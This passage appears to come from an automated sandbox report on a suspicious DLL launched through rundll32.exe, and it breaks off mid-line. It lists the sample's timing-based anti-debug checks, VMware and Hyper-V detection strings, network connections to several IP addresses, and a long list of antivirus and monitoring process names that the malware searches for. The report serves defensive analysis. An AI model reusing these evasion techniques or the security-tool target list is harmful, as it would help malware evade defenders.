    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC57 second address: 7FFD944ABC5C instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov esp, eax 0x00000005 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC5C second address: 7FFD944ABC83 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov eax, eax 0x00000005 dec esp 0x00000006 add ebx, dword ptr [esp+000000C8h] 0x0000000d dec eax 0x0000000e add edi, dword ptr [esp+000000C0h] 0x00000015 mov eax, 00000001h 0x0000001a cpuid 0x0000001c dec esp 0x0000001d add edx, dword ptr [esp+000000B8h] 0x00000024 dec ebp 0x00000025 add edx, ebx 0x00000027 rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC83 second address: 7FFD944ABC8E instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov ebx, eax 0x00000005 dec esp 0x00000006 add ebx, ebp 0x00000008 dec eax 0x00000009 add ebx, edi 0x0000000b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABC8E second address: 7FFD944ABCA9 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 mov edi, eax 0x00000005 dec ecx 0x00000006 add ecx, ebp 0x00000008 dec ecx 0x00000009 add edi, esi 0x0000000b dec ebp 0x0000000c add ecx, esi 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 dec ebp 0x00000016 add ecx, edx 0x00000018 dec ebp 0x00000019 add edi, esp 0x0000001b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABCA9 second address: 7FFD944ABCB4 instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 mov edx, eax 0x00000005 dec ecx 0x00000006 add edi, ebx 0x00000008 dec esp 0x00000009 add edi, eax 0x0000000b rdtsc
    Source: C:\Windows\System32\rundll32.exeRDTSC instruction interceptor: First address: 7FFD944ABCB4 second address: 7FFD944ABCCC instructions: 0x00000000 rdtsc 0x00000002 dec ebp 0x00000003 add edx, ebx 0x00000005 dec ebp 0x00000006 add edx, edi 0x00000008 dec eax 0x00000009 add edi, eax 0x0000000b mov eax, 00000001h 0x00000010 cpuid 0x00000012 dec esp 0x00000013 add edi, ecx 0x00000015 dec ecx 0x00000016 sub edx, edi 0x00000018 rdtsc
    Source: C:\Windows\System32\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-2498
    Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.0 %
    Source: C:\Windows\System32\loaddll64.exe TID: 6996 Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
    Source: Amcache.hve.10.drBinary or memory string: VMware
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWAlar%SystemRoot%\system32\mswsock.dll
    Source: rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
    Source: rundll32.exe, 0000000D.00000003.2787058914.0000025BEE294000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllERCPL.exe
    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: calMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
    Source: rundll32.exe, 0000000D.00000003.3089085224.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual
    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: rundll32.exe, 0000000D.00000003.3012083156.0000025BEE2EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBmory
    Source: rundll32.exe, 0000000D.00000003.2562770497.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
    Source: rundll32.exe, 0000000D.00000003.3089085224.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual
    Source: rundll32.exe, 0000000D.00000003.2562770497.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB+
    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\System32\rundll32.exe Process queried: DebugPort
    Source: C:\Windows\System32\rundll32.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\rundll32.exe Network Connect: 34.120.62.213 443
    Source: C:\Windows\System32\rundll32.exe Network Connect: 195.133.1.117 80
    Source: C:\Windows\System32\rundll32.exe Network Connect: 13.227.9.174 80
    Source: C:\Windows\System32\rundll32.exe Network Connect: 13.227.9.48 80
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Windows\System32\rundll32.exe VolumeInformation
    Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00007FFD9465FC00 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter
    Source: rundll32.exe Binary or memory string: SPIDERML.EXE
    Source: rundll32.exe Binary or memory string: procmon.exe
    Source: rundll32.exe Binary or memory string: tmpfw.exe
    Source: rundll32.exe Binary or memory string: AVKService.exe
    Source: rundll32.exe Binary or memory string: fsgk32.exe
    Source: rundll32.exe Binary or memory string: MCAGENT.exe
    Source: rundll32.exe Binary or memory string: cctray.exe
    Source: rundll32.exe Binary or memory string: AVGNSX.EXE
    Source: rundll32.exe Binary or memory string: fnrb32.exe
    Source: rundll32.exe Binary or memory string: MCUPDATE.exe
    Source: rundll32.exe Binary or memory string: AVGWDSVC.exe
    Source: rundll32.exe Binary or memory string: KAVSVC.exe
    Source: rundll32.exe Binary or memory string: rtvscan.exe
    Source: rundll32.exe Binary or memory string: fsm32.exe
    Source: rundll32.exe Binary or memory string: AVGCSRVX.EXE
    Source: rundll32.exe Binary or memory string: KPFWSvc.exe
    Source: rundll32.exe Binary or memory string: ravmond.exe
    Source: rundll32.exe Binary or memory string: fsav32.exe
    Source: rundll32.exe Binary or memory string: defwatch.exe
    Source: rundll32.exe Binary or memory string: avgemc.exe
    Source: rundll32.exe Binary or memory string: fsdfwd.exe
    Source: rundll32.exe Binary or memory string: nmain.exe
    Source: rundll32.exe Binary or memory string: CLAMWIN.exe
    Source: rundll32.exe Binary or memory string: ASHMAISV.exe
    Source: rundll32.exe Binary or memory string: ACAAS.exe
    Source: rundll32.exe Binary or memory string: MCSHIELD.EXE
    Source: rundll32.exe Binary or memory string: pavfnsvr.exe
    Source: rundll32.exe Binary or memory string: kxetray.exe
    Source: rundll32.exe Binary or memory string: wireshark.exe
    Source: rundll32.exe Binary or memory string: fast.exe
    Source: rundll32.exe Binary or memory string: fameh32.exe
    Source: rundll32.exe Binary or memory string: drweb32w.exe
    Source: rundll32.exe Binary or memory string: aswupdsv.exe
    Source: rundll32.exe Binary or memory string: pctsGui.exe
    Source: rundll32.exe Binary or memory string: 360tray.exe
    Source: rundll32.exe Binary or memory string: kissvc.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avuser.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav95.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WEBPROXY.EXE
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NOD32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE285000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcvsshld.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CCenter.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KWatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: inicio.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E5000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: mcvsrte.exe
    Source: rundll32.exe, 00000007.00000003.2335770527.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DD7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2333913914.000001F583DC1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239256609.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cfp.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: aswUpdsv.exe
    Source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsaa.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RTVscan.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPROTTRAY.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639278156.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE27F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KvXP.kxp
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 